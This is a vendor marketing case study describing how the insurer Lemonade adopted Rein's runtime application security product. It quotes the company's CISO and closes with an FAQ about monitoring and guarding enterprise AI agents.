Background: Reinventing Insurance – and Rethinking Application Security
“Forget everything you know about insurance.” That line pretty much captures Lemonade – the company that rewrote the rules of an entire industry. With an AI-driven platform and a fully automated customer experience, the company combined a high-velocity tech startup mindset with traditional insurance to change the game for good. That pace demands a security approach that matches their culture: precise, fast, and grounded in real time data.
Lemonade’s security team operates with the same trailblazing mindset. Protecting a platform that processes millions of real-time decisions requires more than edge defenses or pattern-based alerts; It requires seeing what actually happens inside the application. As their microservices ecosystem grew, the team wanted deeper runtime visibility, accurate exploit detection, and developer-friendly insights that wouldn’t slow innovation.
The Security Team’s Goals
The Lemonade security team’s mission is simple:
“Keep the application running. Stop any attack.” -Jonathan Jaffe, CISO
To achieve that, they needed a solution that could:
- Detect real, exploitable behavior
- Eliminate noise and reduce time spent tuning rules
- Provide deterministic, code-level protection and remediation
- Support developers with clear runtime context
- Evolve toward runtime-informed posture management and automated remediation
Facing The Reality of API Security
Lemonade built a solid API security stack – but quickly discovered its limits. The tools were passive, reliant on patterns, and blind to what the application was actually doing. Noise went up; Clarity went down. As Jonathan explained, the challenges were clear:
Too Much Noise, Too Little Precision
“It was noisy… more cleanup than actually acting on security issues. It required a lot of effort to figure out what was going on.”
No Runtime or Code-Level Visibility
“It was really just looking at HTTP calls… the tools weren’t aware of the code at all.”
A Need for Better Developer Experience
“The web app was not easy to figure out and track issues to resolution.”
Finding Answers in Production
When Lemonade evaluated alternatives, Rein stood out for one reason: it finally gave them truth from inside the application.
They needed something more than just a “slightly smarter firewall”.As Jonathan put it, “We needed more visibility into the code itself.”
With Rein, the experience was different.
Deterministic Baselines, Not Guesses
Rein’s contextual baselining (based on full production visibility) immediately changed Lemonade’s confidence in detection.
“The baseline that Rein is building… that was the main thing. We can trust that when something deviates, it’s real.”
Instead of looking at traffic patterns, Rein observes the actual execution of functions, files, libraries, and API behavior- so when something looks off, it is off.
Noise Drops Dramatically
By grounding detection in true application behavior, Rein eliminated the constant cleanup and retuning required by legacy tools.
“We don’t need to chase patterns anymore… Rein puts us in a more secure place than chasing known patterns.”
What used to be a stream of false positives became a small number of high-signal events.
Real Runtime Protection- Even for Zero-Days
Rein doesn’t just detect behavior; it stops it.
“If someone tries to run a command, Rein will block it, as long as it deviates from the baseline.”
This protects Lemonade against the exact type of in-app exploit attempts that network tools- including WAF- cannot reach.
Developers Became Advocates
One unexpected outcome for Lemonade: engineering teams pushed for Rein to move into production.
“Rein moved to production quickly because developers requested it. They wanted the visibility Rein provides.”
This visibility helps developers understand real API usage, package behavior, and execution flows- speeding investigations and improving code quality.
The Bottom Lines
Lemonade brought in Rein to see exactly what their apps were doing in real time- no guesses, no noise, no “maybe”. Deterministic visibility plus precise exploitation detection gave them fewer alerts, stronger defenses, and developers who could actually move faster. The result? Production-based security that matches their mandate: keep the app running, stop every attack.
FAQs
-
Enterprises are rethinking AppSec because enterprise agents now execute customer-facing and regulated business workflows that traditional perimeter defenses cannot fully observe or control.
- Investigate how enterprise agents interact with APIs, internal services, MCP servers, and downstream operational systems during runtime execution
- Prioritize deterministic runtime visibility over pattern matching and theoretical threat modeling
- Correlate execution behavior directly to business outcomes such as claims processing, approvals, payments, or customer decisions
- Build security workflows around operational continuity instead of alert volume alone
-
Traditional API security approaches are insufficient because they observe traffic patterns without understanding what enterprise agents and applications actually execute in production.
- Trace how enterprise agents invoke APIs, libraries, files, MCPs, and downstream services during live execution
- Validate whether runtime behavior aligns with approved operational workflows and business processes
- Investigate which execution chains can access sensitive systems, regulated data, or customer infrastructure
- Reduce operational noise created by disconnected HTTP-level visibility and static assumptions
-
Deterministic runtime visibility is critical because enterprise security teams need to know exactly what enterprise agents and applications are doing inside production systems in real time.
- Trace complete execution chains across prompts, APIs, MCP activity, libraries, databases, and external services
- Investigate which users, workflows, or systems triggered sensitive runtime behavior
- Validate whether enterprise agents deviated from approved operational baselines
- Accelerate incident response using execution evidence instead of fragmented logs and assumptions
-
Enterprises are replacing pattern-based detection because enterprise agent environments generate too much operational noise when security decisions rely on signatures and traffic heuristics alone.
- Baseline legitimate enterprise agent behavior across APIs, tools, MCP servers, libraries, and operational workflows
- Detect deviations tied to abnormal execution paths, unauthorized resource access, or unsafe downstream actions
- Prioritize high-confidence runtime events grounded in real production behavior
- Eliminate excessive tuning and cleanup workflows caused by legacy perimeter-based approaches
Explore how Rein defeats Claude Mythos.
-
Rein captures the complete execution chain of every enterprise agent and application action and directly connects runtime behavior to operational business outcomes.
- Observe prompts, APIs, libraries, MCP activity, stack traces, and resource access in real time
- Investigate how enterprise agents interact with claims systems, customer workflows, financial infrastructure, or regulated operations
- Correlate execution activity with the exact users, systems, and downstream operational impact involved
- Replace fragmented AppSec assumptions with deterministic execution visibility grounded in production reality
-
Rein enforces dynamic behavioral guardrails at the execution layer by continuously learning legitimate enterprise agent behavior and blocking unsafe deviations immediately.
- Detect abnormal execution chains involving APIs, MCP servers, tools, libraries, or downstream systems
- Block unauthorized commands, resource access, or operational actions before execution completes
- Protect customer-facing and regulated workflows from unsafe autonomous behavior
- Stop exploitation attempts even when vulnerabilities are unknown or have no published signatures
Discover how Rein secures enterprise agents in your organization.
